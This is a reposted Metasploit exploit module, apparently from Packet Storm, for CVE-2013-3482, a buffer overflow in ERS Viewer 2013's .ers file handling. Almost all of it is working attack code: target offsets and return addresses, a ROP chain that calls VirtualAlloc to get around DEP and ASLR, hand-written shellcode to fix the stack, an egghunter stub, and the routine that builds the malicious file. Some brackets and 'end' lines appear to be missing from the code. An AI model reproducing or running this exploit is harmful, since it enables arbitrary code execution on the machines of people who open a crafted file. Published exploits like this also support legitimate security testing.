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ERS Viewer 2013 ERS File Handling Buffer Overflow

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Description : This Metasploit module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This Metasploit module has been tested successfully with ERS Viewer 2013 (versions on Windows XP SP3 and Windows 7 SP1.

Author : James Fitts, juan vazquez

Source : ERS Viewer 2013 ERS File Handling Buffer Overflow ? Packet Storm

Code :

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter

def initialize(info={})
'Name' => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
The vulnerability exists in the module ermapper_u.dll, where the function
rf_report_error handles user provided data in a insecure way. It results in
arbitrary code execution under the context of the user viewing a specially crafted
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions on Windows XP SP3 and Windows 7 SP1.
'License' => MSF_LICENSE,
'Author' =>
'James Fitts', # Vulnerability Discovery
'juan vazquez' # Metasploit
'References' =>
[ 'CVE', '2013-3482' ],
[ 'OSVDB', '93650' ],
[ 'URL', 'http://secunia.com/advisories/53620/' ]
'Payload' =>
'Space' => 4000,
'DisableNops' => true,
'DefaultOptions' =>
'ExitFunction' => "process",
'Platform' => 'win',
'Targets' =>
# Tested on Windows XP SP3
[ 'ERS Viewer 2013 / NO DEP / NO ASLR',
'Offset' => 191,
'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
# Tested on Windows XP SP3 and Windows 7 SP1
[ 'ERS Viewer 2013 / DEP & ASLR bypass',
'Offset' => 191,
'Ret' => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll
'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
'VirtualAllocPtr' => 0x1010c0f4
'Privileged' => false,
'DisclosureDate' => "May 23 2013",
'DefaultTarget' => 1))

OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)


def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll]
0x10105d87, # POP EBX # RETN [ermapper_u.dll]
0xffffffff, #
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x100e9dd9, # POP EAX # RETN [ermapper_u.dll]
0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx)
0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll]
0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
0x10086d21, # RETN (ROP NOP) [ermapper_u.dll]
0x1001a148, # & push esp # ret [ermapper_u.dll]
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x100f687d, # NEG EAX # RETN [ermapper_u.dll]
0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
0x100288b5, # POP EAX # RETN [ermapper_u.dll]
0x90909090, # nop
0x100e69e0, # PUSHAD # RETN [ermapper_u.dll]

return rop_gadgets

# Restore the stack pointer in order to execute the final payload successfully
def fix_stack
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
return pivot

# In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
# the payload on memory we can't jump there directly, but allocate executable memory
# and jump there. Badchars: "\x0a\x0d\x00"
def hunter_suffix(payload_length)
# push flProtect (0x40)
suffix = "\xB8\xC0\xFF\xFF\xFF" # mov eax, 0xffffffc0
suffix << "\xF7\xD8" # neg eax
suffix << "\x50" # push eax
# push flAllocationType (0x3000)
suffix << "\x66\x05\xC0\x2F" # add ax, 0x2fc0
suffix << "\x50" # push eax
# push dwSize (0x1000)
suffix << "\x66\x2D\xFF\x1F" # sub ax, 0x1fff
suffix << "\x48" # dec eax
suffix << "\x50" # push eax
# push lpAddress
suffix << "\xB8\x0C\x0C\x0C\x0C" # mov eax, 0x0c0c0c0c
suffix << "\x50" # push eax
# Call VirtualAlloc
suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
# Copy payload (edi) to Allocated memory (eax)
suffix << "\x89\xFE" # mov esi, edi
suffix << "\x89\xC7" # mov edi, eax
suffix << "\x31\xC9" # xor ecx, ecx
suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length
suffix << "\xF3\xA4" # rep movsb
# Jmp to the final payload (eax)
suffix << "\xFF\xE0" # jmp eax

return suffix

def exploit

#These badchars do not apply to the final payload
badchars = [0x0c, 0x0d, 0x0a].pack("C*")

eggoptions =
:checksum => true,
:eggtag => 'w00t'
my_payload = fix_stack + payload.encoded

if target.name =~ /DEP & ASLR bypass/
# The payload length can't include NULL's in order to
# build the stub which will copy the final payload to
# executable memory
while [my_payload.length].pack("v").include?("\x00")
my_payload << rand_text(1)

hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)

if target.name =~ /DEP & ASLR bypass/
hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))

if target.name =~ /NO DEP/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # jmp eax
buf << rand_text_alpha(8)
buf << egg
elsif target.name =~ /DEP & ASLR bypass/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << create_rop_chain
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # xchg eax, esp # ret
buf << rand_text_alpha(8)
buf << egg

ers = %Q|
DatasetHeader Begin
#{buf} End


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